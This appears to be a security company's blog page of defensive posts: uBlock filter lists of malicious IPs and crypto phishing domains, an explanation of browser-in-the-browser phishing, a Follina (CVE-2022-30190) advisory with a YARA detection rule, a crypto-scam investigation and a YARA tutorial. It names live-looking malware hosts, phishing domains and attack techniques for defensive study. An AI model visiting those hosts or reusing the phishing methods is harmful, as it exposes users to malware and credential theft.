Category: Alvosec

The uBlock Origin is a free and open-source, cross-platform browser extension for content filtering – primarily aimed at neutralizing privacy invasion in an efficient, user-friendly method.

There are many free lists – used to block advertisements, trackers, malware, and annoyances.

We’ve made three lists, that can be imported in uBlock Origin extension, to increase security of your browser.

• https://db.alvosec.com/tld
• https://db.alvosec.com/urlhaus
• https://db.alvosec.com/phishing

First one (tld) is used to block most abused top level domains. Use this list if you know what are you doing, and how to deal with whitelisting!

Example:

*.party
*.click
*.gdn
*.men
*.study
*.reise

Top Level Domain (TLD) registries which allow registrars to sell high volumes of domains to professional spammers and malware operators in essence aid and abet the plague of abuse on the Internet. Some registrars and resellers knowingly sell high volumes of domains to these actors for profit, and many registries do not do enough to stop or limit this endless supply of domains.

Second one (urlhaus) is used to block malicious URLs, that are being used for malware distribution.

Example:

http://59.99.199.124:56993/
http://198.23.145.147/223/
http://183.188.4.16:47562/
http://219.157.134.188:45981/

Third list (phishing) blocks all detected phishing websites – related to cryptocurrency world.

Example:

myethervalet.us
solnftgiveaway.net
watchonlywallet.com
roninchain.live
ipencakewsags.org
metmask.me
lmyetherwalletr.com

To add our lists to uBlock, you need to click on extension and click icon for settings and navigate to filter lists. Once you are there, click on import and paste our URLs:

Once you open a URL, which is found in any list it will generate a warning to stay away from that page:

Each list is updated daily except tld. There is a small chance to have some false positives (false warnings) generated by our lists. If you have any questions or suggestions feel free to contact us via Twitter or email us at info@alvosec.com.

A novel phishing technique called browser-in-the-browser (BitB) attack can be exploited to simulate a browser window within the browser in order to spoof a legitimate domain, thereby making it possible to stage convincing phishing attacks.

According to penetration tester and security researcher, who goes by the handle mrd0x on Twitter, the method takes advantage of third-party single sign-on (SSO) options embedded on websites such as “Sign in with Google” (or Facebook, Apple, or Microsoft).

While the default behavior when a user attempts to sign in via these methods is to be greeted by a pop-up window to complete the authentication process, the BitB attack aims to replicate this entire process using a mix of HTML and CSS code to create an entirely fabricated browser window. (The Hacker News)

DEMO

Pop-Up Login Windows

Quite often when we authenticate to a website via Google, Microsoft, Apple etc. we’re provided a pop-up window that asks us to authenticate. The image below shows the window that appears when someone attempts to login to Canva using their Google account.

Replicating The Window

Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and its basically indistinguishable. The image below shows the fake window compared with the real window. Very few people would notice the slight differences between the two.

We’ve made an example of phishing website for webauth.com, just for the sake of learning. What you see is fake pop-up window, made in HTML/CSS, so from that point an attacker can make URL to look legit and deceive victim into logging in.

Real login windows are browser windows, and they act that way. You can maximize and minimize them and move them anywhere on the screen. Fake pop-ups are bound to the page where they’re located. They can also move freely and cover buttons and images, but only inside their boundaries — that is, within the browser window. They cannot go outside it. That difference should help you spot them.

Description

A vulnerability has been discovered in Microsoft Support Diagnostic Tool (MSDT) which could allow for arbitrary code execution. MSDT can be called using the URL protocol from a calling application like Word allowing an attacker to run arbitrary code with the privileges of the user that executed the program. An attacker can entice a victim to open a malicious Word document resulting in code execution without macros enabled. The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user’s rights.

Follina PoC (Proof of concept)

The attack pattern would be as follows:

Targeted systems

This vulnerability affects systems 7, 10 and 11, Server 2008 to 2022 both 32-bit and 64-bit, regardless of the system language.

Workarounds

To disable the MSDT URL Protocol

Disabling MSDT URL protocol prevents troubleshooters being launched as links including links throughout the operating system. Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters. Follow these steps to disable:

1. Run Command Prompt as Administrator.
2. To back up the registry key, execute the command “reg export HKEY_CLASSES_ROOT\ms-msdt filename“
3. Execute the command “reg delete HKEY_CLASSES_ROOT\ms-msdt /f”.

How to undo the workaround

1. Run Command Prompt as Administrator.
2. To restore the registry key, execute the command “reg import filename” 

Yara rule to detect

rule Follina_CVE_2022_30190
{
meta:
author = “Joe Security”
reference = “https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e”
strings:
$msdt1 = “ms-msdt:/id” ascii wide nocase
$msdt2 = “ms-msdt:-id” ascii wide nocase
$para1 = “IT_RebrowseForFile” ascii wide nocase
condition:
(1 of ($msdt) and 1 of ($para))
}

References:

CVE
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190
Microsoft
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190
https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
PCmag
https://www.pcmag.com/news/researchers-reveal-follina-zero-day-vulnerability-in-microsoft-office

The rise in popularity of cryptocurrencies has encouraged cybercriminals to find innovative ways to attack markets, users and any structure where cryptocurrencies are stored. In simple words, if an attacker is able to exploit some area of a chain, smart contract, exchange or illegitimately withdraw cryptocurrency, it would be deemed as a hack or stealing. Scammers around the world took home a record of $14 billion in cryptocurrency in 2021.

By the time of our researching crypto scams, we have witnessed that methods of these scammers are getting more and more sophisticated, and that’s why we advise all users to be extra cautious when they engage with something unusual/unverified.

Let’s dig into the story…

We have found a website that was targeting crypto users by using phishing tactics. In the beginning we’ve checked a source code of that website and found that most of the page was mirrored by using HTTrack. (HTTrack is an easy-to-use website mirror utility.) That’s a first sign that website is suspicious.

Often you will see on fraudulent websites linked social profiles, but in reality that href attribute is empty and doesn’t include any social media accounts. That’s second sign of browsing suspicious website.

While exploring their source code, we found walletconnect script that used a call to the eth_sendTransaction method.

Here is an example that was used in order to perform unauthorized transaction to that ETH address.

In further analysis we have detected unusual script smtp.js, which is often used to create communication with mail servers.

There was another script sendmail.js, where we found credentials to authenticate into the scammer mailbox.

So basically, whenever user scanned QR code on this phishing website, it checked his balance of ETH, tried to perform transaction and if that failed, the script grabbed private key and sent to scammer mailbox.

Here is a script that revealed all SMTP information from a scammer, which was used to send stolen private keys to their Gmail account.

We are still in progress of recovering stolen funds, meanwhile we will publish, if any additional information will be found from affected users.

While we perform researches like this one, we often come across sensitive data that we handle with caution! We also never take any funds from third party users! Make sure to read our privacy policy.

2022 is the year for cryptocurrency and blockchain as more and more people are interesting to involve to different aspects of this new technology. While most of us are still exploring how it works, scammers have already found a million ways to make a profit — by creating fake cryptocurrency trading websites and fake crypto wallet apps.

In this article we want to present, how we discovered the chain of fake crypto exchanges and how they work in order to keep you away from them.

How fake crypto websites work

Scammers create fake cryptocurrency trading platforms or fake versions of official crypto wallet to exploit victims. These fake sites tend to have similar, but slightly different domain names from the legitimate ones, sometimes making it hard for users to tell. What’s worse, some of these copycat websites even appear very high in search results and look exceptionally similar to the real versions. Also recently scammers started to use Google ads to promote their fake websites with higher ranking score.

How they look and what they offer

One of our users (LukeVeK) from Proton community reported that someone tried to scam him. Here is what he said:

So basically they will tell you, that you have certain amount of BTC, but the moment you try to withdraw it will ask you to cover fee or that withdraw balance is bellow minimum and that you have to deposit 0.15 BTC.

Here is a list of all fake websites discovered:

• mon-bit[.]com
• goldybit[.]com
• bit-local[.]com
• mount-trade[.]com
• rhinocrypt[.]com
• bit-trade[.]com
• bit-grate[.]com
• mount-traiding[.]com
• waffebtc[.]com
• earthxcoin[.]com
• fastxbit[.]com
• loop-coin[.]com
• xeratrade[.]com
• trade-wall[.]com
• tiger-bit[.]com
• second-wallet[.]com
• bit-well[.]com
• ebalbit[.]com

Do not open these websites, only if you are experienced security researcher and you are analyzing in secure environment.

All of websites look same, expect for logo and domain name:

Sometimes these scam websites will even let you withdraw a small amount of money at first. Initially, after you have received your first deposits and a handful of seemingly successful investments, the sites seem perfectly legitimate.

However, as you watch their investments continue to grow, you’ll feel encouraged to invest more money. It is then that the scammers spring the trap. When you want to withdraw the earnings, the website either shuts down or declines the request. If you contact “customer service” for help, scammers might even ask you to send deposit money. Of course, you won’t retrieve even one cent.

YARA is an open-source tool designed to help malware researchers identify and classify malware samples. It makes it possible to create descriptions (or rules) for malware families based on textual and/or binary patterns. YARA is multi-platform, running on Linux, Windows and Mac OS X. It can be used through its command-line interface or from Python scripts with the YARA-Python extension.

Let’s see an example:

rule silent_banker : banker
{
    meta:
        description = "This is just an example"
        thread_level = 3
        in_the_wild = true

    strings:
        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}
        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
        $c = "UVODFRYSIHLNWPEJXQZAKCBGMT"

    condition:
        $a or $b or $c
}

The above rule is telling YARA that any file containing one of the three strings must be reported as silent_banker. This is just a simple example, more complex and powerful rules can be created by using wild-cards, case-insensitive strings, regular expressions, special operators and many other features that you’ll find explained in YARA’s documentation.

Here is an example, how to use YARA in practical way:

yara -r rule.yar /home/linux/suspicious_files/

If you want to use with multiple rules, run as follows:

for p in $(find ~/yara-rules/rules/ -type f -name “*.yar”); do yara $p /home/linux/suspicious_files/ -r ; done

Make sure to check our Github repository, where we’ve added some of our rules.